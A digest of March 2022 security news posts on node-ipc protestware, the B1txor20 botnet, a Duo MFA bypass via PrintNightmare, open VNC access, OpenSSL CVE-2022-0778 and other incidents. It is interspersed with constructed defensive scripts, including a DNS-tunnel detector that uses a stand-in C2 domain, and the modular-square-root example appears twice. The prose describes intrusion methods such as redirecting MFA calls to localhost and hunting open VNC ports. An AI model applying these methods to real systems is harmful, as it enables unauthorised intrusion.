RIAEvangelist, the developer behind the popular “node-ipc” NPM package, shipped a new version that wipes files on systems in Russia and Belarus to protest Russia’s invasion of Ukraine.

The Node-ipc node module allows local and remote inter-process communication with support for Linux, macOS, and Windows. It has over 1 million weekly downloads.

Versions 10.1.1 and 10.1.2 of the library wipe the content of arbitrary files and replace it with a heart emoji.

The attack was spotted on March 15, 2022, when users of the popular Vue.js frontend JavaScript framework started experiencing the effect of the sabotage.

“This was the result of the nested dependencies node-ipc and peacenotwar being sabotaged as an act of protest by the maintainer of the node-ipc package. This security incident involves destructive acts of corrupting files on disk by one maintainer and their attempts to hide and restate that deliberate sabotage in different forms. While this is an attack with protest-driven motivations, it highlights a larger issue facing the software supply chain: the transitive dependencies in your code can have a huge impact on your security.” reads the analysis published by security firm Snyk. “A very clear abuse and a critical supply chain security incident will occur for any system on which this NPM package will be called upon, if that matches a geo-location of either Russia or Belarus.”

Experts tracked the problem with the CVE-2022-23812, further investigation revealed that the wiping behavior was implemented on March 7 (version 10.1.1), and a second update took place 10 hours later (version 10.1.1).

The wiper code was removed from the package with release 10.1.3. Later, RIAEvangelist released a major update (version 11.0.0), which imported another dependency called “peacenotwar”, released as a form of “non-violent protest against Russia’s aggression.”

“This code serves as a non-destructive example of why controlling your node modules is important. It also serves as a non-violent protest against Russia’s aggression that threatens the world right now. This module will add a message of peace on your users’ desktops, and it will only do it if it does not already exist just to be polite.” reads the description for the code.

“Any time the node-ipc module functionality gets called, it prints to STDOUT a message taken out of the peacenotwar module, as well as places a file on the user’s Desktop directory with contents relating to the current war-time situation of Russia and Ukraine,” continues the analysis.

Version 11.1.0 of node-ipc, released on March 15, 2022, updates the “peacenotwar” package from version 9.1.3 to 9.1.5 and bundles the “colors” NPM library, while it no longer includes the STDOUT console messages.

Researchers noted that the npm packages colors and faker were intentionally corrupted by their maintainer, Marak, in January.

This mode of protest opens up disturbing scenarios: activists could carry out other supply chain attacks to compromise and destroy target systems.

“Snyk stands with Ukraine and we’ve proactively acted to support the Ukrainian people during the on-going crisis with donations and free service to developers world-wide, as well as taking action to cease business in Russia and Belarus.” conclude the experts. “That said, intentional abuse such as this undermines the global open source community and requires us to flag impacted versions of node-ipc as security vulnerabilities.”
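As an added example that is not part of the post, of Snyk's tooling, or of node-ipc itself, the following script audits an npm lockfile for the releases described above. The lockfile content is constructed, and treating every release from 11.0.0 onward as protestware is an assumption drawn from the versions the post names (11.0.0 and 11.1.0).

```python
"""Flag sabotaged node-ipc releases in a package-lock.json.

Constructed example.  Lockfile v2 (npm 7+) keeps a "packages" map whose keys
are install paths such as "node_modules/a/node_modules/b", so nested copies of
a dependency are visible without walking node_modules on disk.
"""
import json
from typing import Dict, List, Tuple

# Constructed lockfile: one sabotaged node-ipc at top level, an older clean copy
# nested under another library, and the peacenotwar module pulled in by 11.x.
CONSTRUCTED_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"dependencies": {"some-lib": "^1.0.0"}},
        "node_modules/node-ipc": {"version": "10.1.2"},
        "node_modules/some-lib/node_modules/node-ipc": {"version": "9.2.1"},
        "node_modules/peacenotwar": {"version": "9.1.5"},
    },
})

# Facts from the post: 10.1.1 and 10.1.2 carried the file wiper (CVE-2022-23812),
# 10.1.3 removed it, 11.0.0 and 11.1.0 import peacenotwar.
WIPER_VERSIONS = {(10, 1, 1), (10, 1, 2)}
PROTESTWARE_FROM = (11, 0, 0)   # assumption: later 11.x releases keep the import


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn "10.1.2" (or "10.1.2-beta.1") into a comparable tuple."""
    major, minor, patch = version.split("-")[0].split(".")[:3]
    return int(major), int(minor), int(patch)


def classify(version: str) -> str:
    """Return "destructive", "protestware" or "clean" for a node-ipc version."""
    v = parse_version(version)
    if v in WIPER_VERSIONS:
        return "destructive"
    if v >= PROTESTWARE_FROM:
        return "protestware"
    return "clean"


def audit_lock(lock_json: str) -> List[Dict[str, str]]:
    """List every affected node-ipc copy and every peacenotwar copy in the lockfile."""
    lock = json.loads(lock_json)
    hits: List[Dict[str, str]] = []
    for path, meta in lock.get("packages", {}).items():
        name = path.split("node_modules/")[-1] if path else ""   # "" is the root project
        if name == "node-ipc":
            verdict = classify(meta["version"])
            if verdict != "clean":
                hits.append({"path": path, "version": meta["version"], "verdict": verdict})
        elif name == "peacenotwar":
            hits.append({"path": path, "version": meta["version"], "verdict": "protestware"})
    return hits


if __name__ == "__main__":
    for hit in audit_lock(CONSTRUCTED_LOCK):
        print(f"{hit['verdict']:12} {hit['path']} ({hit['version']})")
```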


Pierluigi Paganini

(SecurityAffairs – hacking, node-ipc)


SolarWinds Warns of Attacks Targeting Web Help Desk Users

Thu, 03/17/2022 - 10:45
SolarWinds warns customers of potential cyberattacks targeting unpatched installs of its Web Help Desk (WHD) product.

SolarWinds has published a security advisory to warn customers of the risk of cyberattacks targeting unpatched Web Help Desk (WHD) installs.

The WHD is described by SolarWinds as an affordable Help Desk Ticketing and Asset Management Software.

SolarWinds stated that one of its customers was the victim of an attempted external attack on its instance of WHD. The attack was blocked by the customer’s endpoint detection and response (EDR) system. The vendor immediately launched an investigation into the hacking attempt.

“A SolarWinds customer reported an external attempted attack on their instance of Web Help Desk (WHD) 12.7.5. The customer’s endpoint detection and response (EDR) system blocked the attack and alerted the customer to the issue.” reads the Advisory published by SolarWinds. “In an abundance of caution, SolarWinds recommends all Web Help Desk customers whose WHD implementation is externally facing to remove it from your public (internet-facing) infrastructure until we know more. If you are not able to remove it from your public infrastructure at this time, we recommend you ensure you have EDR software deployed, and are monitoring the WHD instance.”

The unauthenticated access issue impacts only WHD version 12.7.5, which was released in May 2021. The company recommends that customers disconnect their WHD 12.7.5 installs from the Internet or protect them by deploying an EDR solution.


Pierluigi Paganini

(SecurityAffairs – hacking, WHD)


Ukraine SBU arrested a hacker who supported Russia during the invasion

Thu, 03/17/2022 - 08:50
The Security Service of Ukraine (SBU) announced the arrest of a “hacker” who helped Russian Army during the invasion.

The Security Service of Ukraine (SBU) announced the arrest of a hacker who provided technical support to Russian troops during the invasion; the man provided mobile communication services inside Ukrainian territory.

The man broadcast text messages to Ukrainian officials asking them to lay down their weapons and join Russia.

“SBU arrested a hacker who provided the invaders with a cellular connection in Ukraine” reads the SBU’s announcement. “With the help of this collaborator the enemy:”

  • made anonymous phone calls from Russia to the invaders’ mobile phones in Ukraine;
  • sent SMS messages to the Ukrainian security forces and public officials offering to surrender and join the invaders;
  • transferred commands to different Russian groups.

“The hacker allowed up to a thousand calls to be made in one day. Many of them were from the top leadership of the enemy army,” continues the announcement.

The SBU has identified and arrested the man and seized his equipment.


Pierluigi Paganini

(SecurityAffairs – hacking, Security Service of Ukraine)


B1txor20 Linux botnet uses DNS tunnel and Log4J exploit

Thu, 03/17/2022 - 07:16
Researchers uncovered a new Linux botnet, tracked as B1txor20, that exploits the Log4J vulnerability and uses a DNS tunnel for C2 communications.

Researchers from Qihoo 360’s Netlab have discovered a new backdoor used to infect Linux systems and enlist them in a botnet tracked as B1txor20.

The malware was first spotted on February 9, 2022, when 360Netlab’s honeypot system captured an unknown ELF file that was spreading by exploiting the Log4J vulnerability.

The name B1txor20 is based on the file name “b1t” used for the propagation and the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes.

The B1txor20 Linux backdoor uses DNS tunneling for C2 communications; below is the list of the main features implemented by the threat:

  • SHELL
  • Proxy
  • Execute arbitrary commands
  • Install Rootkit
  • Upload sensitive information

The researchers also noticed the presence of many developed features that have not yet been used, some of them affected by bugs. Experts believe the B1txor20 botnet is still under development.

“In short, B1txor20 is a Backdoor for the Linux platform, which uses DNS Tunnel technology to build C2 communication channels. In addition to the traditional backdoor functions, B1txor20 also has functions such as opening Socket5 proxy and remotely downloading and installing Rootkit.” reads the analysis published by the experts.

Once the system has been compromised, the threat connects to the C2 over the DNS tunnel and retrieves and executes the commands sent by the server. The researchers noticed that the bot supports a total of 14 commands that allow it to execute arbitrary commands, upload system information, manipulate files, start and stop proxy services, and create reverse shells.

“Generally speaking, the scenario of malware using DNS Tunnel is as follows: Bot sends the stolen sensitive information, command execution results, and any other information that needs to be delivered, after hiding it using specific encoding techniques, to C2 as a DNS request; After receiving the request, C2 sends the payload to the Bot side as a response to the DNS request. In this way, Bot and C2 achieve communication with the help of DNS protocol.” continues the analysis.
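The query pattern the quoted paragraph describes (data encoded into DNS request names, payload returned in the response) is what a resolver log shows as many unique, long, high-entropy subdomains under one parent domain. As an added example that is not 360Netlab's code, the script below scores constructed resolver log lines with those heuristics; the log format, domains and thresholds are assumptions for the demo.

```python
"""Heuristic DNS-tunnel detection over constructed resolver logs.

Constructed example.  Each log line is "<client> <qtype> <qname>"; the
detector groups queries by parent domain and flags domains whose first
labels are numerous, long and high-entropy, the footprint of a bot pushing
encoded data out through DNS requests.
"""
import hashlib
import math
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Query(NamedTuple):
    client: str
    qtype: str
    qname: str


def constructed_log() -> List[str]:
    """Ordinary lookups plus a tunnel-like stream under c2-example.test."""
    lines = [
        "10.0.0.5 A www.example.com",
        "10.0.0.5 A mail.example.com",
        "10.0.0.7 AAAA cdn.example.com",
        "10.0.0.7 A www.example.com",
    ]
    for n in range(8):
        # Stand-in for an encoded chunk of bot output (sha256 slice, constructed).
        chunk = hashlib.sha256(f"chunk-{n}".encode()).hexdigest()[:24]
        lines.append(f"10.0.0.9 TXT {chunk}.c2-example.test")
    return lines


def parse_line(line: str) -> Query:
    client, qtype, qname = line.split()
    return Query(client, qtype, qname.lower().rstrip("."))


def parent_domain(qname: str) -> str:
    # Simplification: the last two labels are taken as the registrable domain.
    # A production detector would consult the public suffix list instead.
    return ".".join(qname.split(".")[-2:])


def shannon_entropy(text: str) -> float:
    """Bits per character; random hex/base32 data scores well above plain words."""
    if not text:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def tunnel_suspects(lines: List[str], min_unique: int = 5,
                    min_label_len: float = 16, min_entropy: float = 3.3) -> Dict[str, dict]:
    """Return {parent_domain: stats} for domains whose query stream looks tunnelled."""
    first_labels: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        q = parse_line(line)
        parent = parent_domain(q.qname)
        sub = q.qname[: -len(parent) - 1] if q.qname != parent else ""
        if sub:
            first_labels[parent].append(sub.split(".")[0])
    suspects: Dict[str, dict] = {}
    for parent, labels in first_labels.items():
        unique = set(labels)
        avg_len = sum(len(l) for l in unique) / len(unique)
        entropy = shannon_entropy("".join(unique))
        if len(unique) >= min_unique and avg_len >= min_label_len and entropy >= min_entropy:
            suspects[parent] = {"unique": len(unique), "avg_len": round(avg_len, 1),
                                "entropy": round(entropy, 2)}
    return suspects


if __name__ == "__main__":
    for domain, stats in tunnel_suspects(constructed_log()).items():
        print(f"[!] possible DNS tunnel: {domain} {stats}")
```

Thresholds need tuning per environment: CDNs and some security products legitimately produce long, random-looking labels, so treat a hit as a lead to confirm with the client's process and TXT-response volume rather than as a verdict.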

The post includes additional technical details along with Indicators of Compromise (IoCs) for this threat.


Pierluigi Paganini

(SecurityAffairs – hacking, B1txor20)


Russia’s disinformation uses deepfake video of Zelenskyy telling people to lay down arms

Wed, 03/16/2022 - 18:44
Russian disinformation continues; this time it used a deepfake video of Zelenskyy inviting Ukrainians to ‘lay down arms.’

A deepfake video of the Ukrainian president Volodymyr Zelenskyy telling his citizens to lay down arms is the latest example of disinformation conducted by Russia-linked threat actors.

The fake video shows President Zelenskyy saying ‘It turned out to be not so easy being the president.’

“My advice to you is to lay down arms and return to your families. It is not worth it dying in this war. My advice to you is to live. I am going to do the same.” the President says in the fake video.

The quality of the video is very low, and it was easy to debunk because of the mismatch in proportion between the president’s face and his body.

“In the clip being shared online, President Zelenskyy’s head is too big for the body it has been digitally attached to. It is also lit differently and sits at an awkward angle.” reported Yahoo News. “You can also see a higher level of pixelation around the fake Zelenskyy’s head compared to its body. A translator working for Sky News said that the voice in the fake video was deeper and slower than Mr Zelenskyy’s normal voice.”

Zelenskyy, who has demonstrated an outstanding capability in using the media for his messages, commented on the deepfake on his official Instagram account.

#Ukraine Hackers published a deep fake of @ZelenskyyUa urging citizens to lay down their arms. He responded immediately:
"If I can offer someone to lay down their arms, it's the Russian military.Go home.Because we're home. We are defending our land, our children & our families." pic.twitter.com/TiICf3Z5Te

— Hanna Liubakova (@HannaLiubakova) March 16, 2022

“Good day. As for the latest childish provocation with advice to lay down arms, I only advise that the troops of the Russian Federation lay down their arms and return home.” said the Ukrainian President.

“We are already home, we are defending our land, our children, our families. So, we are not going to lay down any arms until our victory.”

According to the media, threat actors hacked the TV24 Ukrainian TV channel to spread the deepfake video along with a written message.

The video went viral on social media, including Facebook, which quickly removed the deepfake video of the Ukrainian President.

“Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did,” said Nathaniel Gleicher, the head of security policy at Meta, Facebook’s parent company.

1/ Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did. It appeared on a reportedly compromised website and then started showing across the internet.

— Nathaniel Gleicher (@ngleicher) March 16, 2022

3/ More about our policy against manipulated media in our community standards: https://t.co/y0iEGbdU8D pic.twitter.com/u4IcXZVne7

— Nathaniel Gleicher (@ngleicher) March 16, 2022

Early this month, the Ukrainian Stratcom Centre, the country’s Centre for Strategic Communications and Information Security warned of Russia’s disinformation using deepfake videos, which could be very difficult to debunk.


Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)


CISA adds 15 new flaws to the Known Exploited Vulnerabilities Catalog

Wed, 03/16/2022 - 17:33
The US Cybersecurity and Infrastructure Security Agency (CISA) added 15 new flaws to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

The new vulnerabilities added to the catalog include one SonicWall SonicOS issue, tracked as CVE-2020-5135, and 14 Microsoft Windows flaws addressed between 2016 and 2019.

CVE-2020-5135 is a stack-based buffer overflow that affects the SonicWall Network Security Appliance (NSA). The vulnerability can be triggered by an unauthenticated HTTP request involving a custom protocol handler.

The flaw resides in the HTTP/HTTPS service used for product management as well as SSL VPN remote access.

All the flaws added in this round have to be addressed by federal agencies by April 5.

The CISA Catalog has reached a total of 504 entries with the latest added issues.


Pierluigi Paganini

(SecurityAffairs – hacking, Cisa)


Russia-linked threat actors exploited default MFA protocol and PrintNightmare bug to compromise NGO cloud

Wed, 03/16/2022 - 09:28
FBI and CISA warn that Russia-linked threat actors gained access to an NGO cloud after enrolling their own device in the organization’s Duo MFA.

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) warned that Russia-linked threat actors gained access to a non-governmental organization (NGO) cloud environment by exploiting misconfigured default multifactor authentication (MFA) protocols and enrolling their own device in the organization’s Cisco Duo MFA.

The nation-state actors gained access to the network by exploiting default MFA protocols and the Windows Print Spooler vulnerability, “PrintNightmare” (CVE-2021-34527), reads the advisory.

As early as May 2021, the attackers took advantage of a misconfigured account set to default MFA protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network.

The exploitation of the PrintNightmare flaw allowed the attackers to run arbitrary code with system privileges. Russian state-sponsored cyber actors successfully exploited the vulnerability while targeting an NGO using Cisco’s Duo MFA, enabling access to cloud and email accounts for document exfiltration.

In order to compromise the target network, the attackers conducted a brute-force password guessing attack against an un-enrolled and inactive account. Contrary to recommended best practices, the account was still active in the organization’s Active Directory.

“The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo’s default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.” reads the joint advisory.

“Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation via exploitation of the “PrintNightmare” vulnerability to obtain administrator privileges.”

Once they had obtained admin privileges, the attackers modified a domain controller file to redirect Duo MFA calls to localhost instead of the legitimate Duo server, preventing the MFA service from contacting its server to validate MFA logins.

This trick allowed the attackers to completely disable MFA for active domain accounts, because the default policy of Duo for Windows is to “fail open” when the MFA server is unreachable.

“After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim’s virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers [T1133]. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts.” continues the analysis. “The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity.”

FBI and CISA shared indicators of compromise for the above attack and provided the following recommendations in the joint advisory:

  • Enforce MFA for all users, without exception. Before implementing, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Ensure inactive accounts are disabled uniformly across the Active Directory, MFA systems etc.
  • Update software, including operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Continuously monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Implement security alerting policies for all changes to security-enabled accounts/groups, and alert on suspicious process creation events (ntdsutil, rar, regedit, etc.).


Pierluigi Paganini

(SecurityAffairs – hacking, Russia-linked threat actors)


Hacker breaches key Russian ministry in blink of an eye

Wed, 03/16/2022 - 03:21
In mere seconds, a hacker remotely accessed a computer belonging to a regional Russian Ministry of Health, taking advantage of sloppy cybersecurity practices to expose its entire network.

Original post at https://cybernews.com/cyber-war/hacker-breaches-key-russian-ministry-in-blink-of-an-eye/

Spielerkid89, who wished to remain anonymous, did not intend to harm the organization and left its systems intact. However, his experiment is a perfect example of how poor cyber hygiene can leave organizations vulnerable to cyber attacks.

Russian state-sponsored cyber attacks can be devastating and leave hundreds of thousands of the Kremlin’s foes without water or electricity.

However, evidence suggests that the rogue superstate’s cyber capabilities are as weak as its military stance in Ukraine, especially when met with resistance.

An army of pro-Ukrainian hacktivists has already demonstrated how easy it is to take vital Russian services offline or deface them with anti-war messages.

No wonder Russia has been preparing to cut itself off from the global internet, hoping to move key government institutions to a sovereign Runet – a pan-Russian web limited to the Federation – to make them less prone to cyber attacks.

#Russia began active preparations for disconnection from the global Internet

No later than March 11, all servers and domains must be transferred to the #Russian zone. In addition, detailed data on the network infrastructure of the sites is being collected. pic.twitter.com/wOCdRqOJej

— NEXTA (@nexta_tv) March 6, 2022

Hacker snoops around the key Russian ministry

Spurred into action by the invasion of Ukraine, Spielerkid89 decided to investigate whether he could find Russian IPs with disabled authentication to poke around in. Using the Shodan search engine, Spielerkid89 soon discovered an open virtual network computing (VNC) port with authentication disabled.

VNC is a desktop sharing system – you can use it to remotely access your work computer from home or any other location, or allow technical support staff to do likewise.

Ideally, VNC should be used only with authenticated users, such as system administrators. Nobody should access a computer without being properly vetted, but that seems to be a security issue that is often overlooked.

As a result, Spielerkid89 connected to a computer belonging to the Ministry of Health in the Omsk region of Russia. To remotely access a ministry employee’s desktop, the hacker didn’t need any password or authentication – he could access all the files and information on that computer via an open VNC port.

“I was able to access people’s names, other IP addresses pointing to other computers on the network, and financial documents, too,” he said.

The Cybernews research team confirmed that Spielerkid89 did indeed gain access to a computer belonging to this Russian ministry. As mentioned above, it was not his intention to harm the organization, and he left its systems intact.

A simple mistake with colossal effect

Spielerkid89 is not a threat actor, and he didn’t harm the organization – he simply took a few screenshots as proof.

However, his experiment illustrates how easy it is for a malicious hacker to breach an organization. By remotely accessing a computer via an open VNC port with disabled authentication, a criminal could download sensitive files, spy on other computers or servers in the network, set up services to create a backdoor, install malware, remote access Trojans, among other things.

“You can do anything you want, basically with full, unfettered access,” Spielerkid89 explained.

He added that open VNC ports with disabled authentication are common cybersecurity malpractice.

“It was so easy to gain access to these systems. They shouldn’t be there unauthenticated. That’s a serious security breach of assets right there. I didn’t need anything to get it, really,” he said.

The port he used to gain entry and snoop around the Omsk ministry is now closed. However, VNC and the Remote Desktop Protocol (RDP) remain among the main entry points into an organization.

Information security company SecurityScorecard has developed a machine-learning model that estimates the relative likelihood of a company falling victim to a ransomware attack.

Businesses are most susceptible to such attacks through vulnerabilities that enable remote-code execution, according to the company’s vice president of cyber threat intelligence, Ryan Sherstobitoff.

“The most common ones are RDP and VNC, because access brokers essentially sell those credentials on the dark web, which would then enable a ransomware actor to get in,” he told Cybernews.

About the author: Jurgita Lapienytė


Pierluigi Paganini

(SecurityAffairs – hacking, local Russian Ministry)


CVE-2022-0778 DoS flaw in OpenSSL was fixed

Tue, 03/15/2022 - 18:40
OpenSSL addressed a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778, related to certificate parsing.

OpenSSL released updates to address a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778, that affects the BN_mod_sqrt() function used during certificate parsing. The flaw was discovered by the well-known Google Project Zero researcher Tavis Ormandy.

An attacker can trigger the vulnerability by crafting a malformed certificate with invalid explicit curve parameters.

“The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.” reads the advisory for this flaw. “It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters.”
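The quoted advisory describes a modular square root (Tonelli-Shanks) whose inner search for the smallest i with t^(2^i) = 1 only terminates when the modulus is prime. As an added example that is not OpenSSL's code, the function below implements the same algorithm with every loop bounded, so a composite modulus (what bogus explicit curve parameters supply) yields an error instead of a hang; the iteration cap is an assumption of the demo.

```python
"""Bounded modular square root illustrating the CVE-2022-0778 failure mode.

Constructed example, not OpenSSL code.  Tonelli-Shanks assumes a prime
modulus p; the "find least i with t^(2^i) == 1" step relies on that.  For a
composite p the condition may never hold, and an unbounded loop spins forever.
Fixed OpenSSL versions abort instead; this code does the same with explicit
iteration caps and a final r*r == a check so a composite p never returns junk.
"""
from typing import Optional

MAX_NONRESIDUE_TRIES = 64   # assumption: cap on the search for a non-residue z


def mod_sqrt(a: int, p: int) -> Optional[int]:
    """Return r with r*r == a (mod p) for prime p, or None if no root is found.

    Never hangs: both searches are bounded, so an untrusted (possibly
    composite) p behaves like a parse error rather than a denial of service.
    """
    if p < 2:
        return None
    a %= p
    if a == 0:
        return 0
    if p == 2:
        return a
    # Euler's criterion: for prime p, a is a quadratic residue iff a^((p-1)/2) == 1.
    if pow(a, (p - 1) // 2, p) != 1:
        return None
    # Write p - 1 = q * 2^s with q odd.
    q, s = p - 1, 0
    while q % 2 == 0:
        q //= 2
        s += 1
    if s == 1:                              # p == 3 (mod 4): closed form
        r = pow(a, (p + 1) // 4, p)
        return r if r * r % p == a else None
    # Find a quadratic non-residue z.  For composite p none may exist, so cap it.
    z = None
    for cand in range(2, 2 + MAX_NONRESIDUE_TRIES):
        if pow(cand, (p - 1) // 2, p) == p - 1:
            z = cand
            break
    if z is None:
        return None
    m, c = s, pow(z, q, p)
    t, r = pow(a, q, p), pow(a, (q + 1) // 2, p)
    while t != 1:
        # Least i (0 < i < m) with t^(2^i) == 1.  With prime p this exists;
        # with composite p it may not, which is exactly the unpatched infinite loop.
        i, tt = 0, t
        while tt != 1:
            tt = tt * tt % p
            i += 1
            if i >= m:
                return None                 # bounded: give up instead of spinning
        b = pow(c, 1 << (m - i - 1), p)
        m, c = i, b * b % p
        t, r = t * c % p, r * b % p
    return r if r * r % p == a else None


if __name__ == "__main__":
    print("sqrt(10) mod 13 =", mod_sqrt(10, 13))    # a root of 10 modulo the prime 13
    print("sqrt(7) mod 25  =", mod_sqrt(7, 25))     # composite modulus: None, no hang
```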

The vulnerability impacts OpenSSL versions 1.0.2, 1.1.1 and 3.0. The maintainers of the project addressed the flaw with the release of versions 1.0.2zd (for premium support customers), 1.1.1n and 3.0.2.

The flaw also affects OpenSSL 1.1.0, but it is out of support and no longer receiving updates.

The fix for this flaw was developed by David Benjamin from Google and Tomáš Mráz from OpenSSL.
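To show the bug class the advisory describes, here is an added Python model of the Tonelli-Shanks modular square root (illustrative code written for this page, not OpenSSL's bn_sqrt.c). Like BN_mod_sqrt() it never verifies that the modulus is prime; the point is that every search loop is bounded, so a composite modulus such as the constructed 21 raises an error where an unbounded loop would spin forever. The iteration cap of 100 in the non-residue search is an arbitrary choice for this example.

```python
def jacobi(a: int, n: int) -> int:
    """Jacobi symbol (a/n) for odd n > 0; equals the Legendre symbol when n is prime."""
    a %= n
    result = 1
    while a:
        while a % 2 == 0:
            a //= 2
            if n % 8 in (3, 5):
                result = -result
        a, n = n, a
        if a % 4 == 3 and n % 4 == 3:
            result = -result
        a %= n
    return result if n == 1 else 0


def mod_sqrt(a: int, p: int) -> int:
    """Tonelli-Shanks square root of a modulo p.
    Like BN_mod_sqrt() this never checks that p is prime, and a composite p
    (e.g. from malformed explicit curve parameters) can make the inner search
    never find t^(2^i) == 1. Bounding i is the defensive check; without it the
    loop spins forever, which is the CVE-2022-0778 bug class."""
    if p < 3 or p % 2 == 0:
        raise ValueError("modulus must be an odd integer >= 3")
    a %= p
    if a == 0:
        return 0
    q, e = p - 1, 0                      # write p - 1 = q * 2**e with q odd
    while q % 2 == 0:
        q, e = q // 2, e + 1
    z = 2                                # quadratic non-residue, chosen via the Jacobi symbol
    while jacobi(z, p) != -1:            # bounded search (cap of 100 is an arbitrary choice)
        z += 1
        if z > 100:
            raise ValueError("no non-residue found: modulus is probably not prime")
    m, c, t, r = e, pow(z, q, p), pow(a, q, p), pow(a, (q + 1) // 2, p)
    while t != 1:
        i, t2 = 0, t                     # find the least i with t^(2^i) == 1 ...
        while t2 != 1:
            t2, i = t2 * t2 % p, i + 1
            if i >= m:                   # ... which must satisfy i < m for a prime p
                raise ValueError("search bound hit: a is not a square or p is not prime")
        b = pow(c, 1 << (m - i - 1), p)
        m, c = i, b * b % p
        t, r = t * c % p, r * b % p
    if r * r % p != a:                   # final consistency check on the result
        raise ValueError("a is not a square modulo p")
    return r
```

With the constructed composite modulus 21 and input 4, t = 16 has order 3 modulo 21, so t squared repeatedly cycles 4, 16, 4, ... and never reaches 1: the bound is the only thing that ends the loop.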



Pierluigi Paganini

(SecurityAffairs – hacking, DoS)

The post CVE-2022-0778 DoS flaw in OpenSSL was fixed appeared first on Security Affairs.

Categories: Cyber Security News

The German BSI agency recommends replacing Kaspersky antivirus software

Tue, 03/15/2022 - 08:37
The German Federal Office for Information Security, also known as BSI, recommends that consumers not use Kaspersky anti-virus software.

The German Federal Office for Information Security, aka BSI, recommends that consumers uninstall Kaspersky anti-virus software. The agency warns that the cybersecurity firm could be implicated in hacking attacks during the ongoing Russian invasion of Ukraine.

Under §7 of the BSI law, the BSI warns against the use of Kaspersky antivirus software and recommends replacing it as soon as possible with defense solutions from other vendors.

Under §7 of the BSI Act, we warn against the use of anti-virus software from the Russian manufacturer Kaspersky. We recommend replacing such applications with products from other manufacturers.

Press release: https://t.co/VC20wRlj4W #DeutschlandDigitalSicherBSI

— BSI (@BSI_Bund) March 15, 2022

“The Federal Office for Information Security (BSI) warns, according to §7 BSI law, against using virus protection software from the Russian manufacturer Kaspersky. The BSI recommends replacing applications from Kaspersky’s virus protection software portfolio with alternative products,” reads the BSI announcement.

The alert pointed out that antivirus software operates with high privileges on machines and, if compromised, could allow an attacker to take them over. BSI remarks that trust in the reliability and self-protection of a manufacturer, as well as in its genuine ability to act, is crucial for the safe use of any defense software. Doubts about the reliability of the manufacturer lead the agency to consider the antivirus protection offered by the vendor a risk for the IT infrastructure that uses it.

BSI warns of potential offensive cyber operations that could be conducted with the support of a Russian IT manufacturer; it also explains that the vendor could be forced to conduct attacks or be exploited for espionage purposes without its knowledge.

The message is clear: companies and other organizations should carefully plan and implement the replacement of essential components of their IT security infrastructure.

The German agency also warns of the risks of a replacement carried out without preparation, which could expose organizations to cyber attacks through temporary losses in comfort, functionality and safety.

The United States has banned government agencies from using Kaspersky defense solutions since 2017. The company rejected any allegation and also clarified that the Russian policies and laws in question apply to telecoms and ISPs, not to security firms like Kaspersky.

In June 2018, the European Parliament passed a resolution that classifies the security firm’s software as “malicious” due to the alleged link of the company with Russian intelligence.

Some European states, including the UK, the Netherlands, and Lithuania, have also excluded the Russian firm’s software from sensitive systems.

German authorities have linked multiple attacks against the Bundestag to Russia; in 2015 a sophisticated attack paralyzed the lower house of parliament.

In October 2020, the Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag).

In March 2021, several members of the German Parliament (Bundestag) and other members of the state parliament were hit by a targeted attack allegedly launched by Russia-linked hackers.


Pierluigi Paganini

(SecurityAffairs – hacking, BSI)

The post The German BSI agency recommends replacing Kaspersky antivirus software appeared first on Security Affairs.

Categories: Cyber Security News

A massive DDoS attack hit Israel, government sites went offline

Mon, 03/14/2022 - 17:51
Many Israeli government websites were offline after a cyberattack; defense sources claim that this is the largest-ever attack to hit the country.

Israeli media reported that a massive DDoS attack took down many Israeli government websites. The Jerusalem Post attributed the attack to an allegedly Iran-linked threat actor that claimed responsibility for it.

Multiple ministries were impacted by the attack, including Health, Interior, and Justice; media also reported that the website of the Prime Minister’s office went temporarily offline.

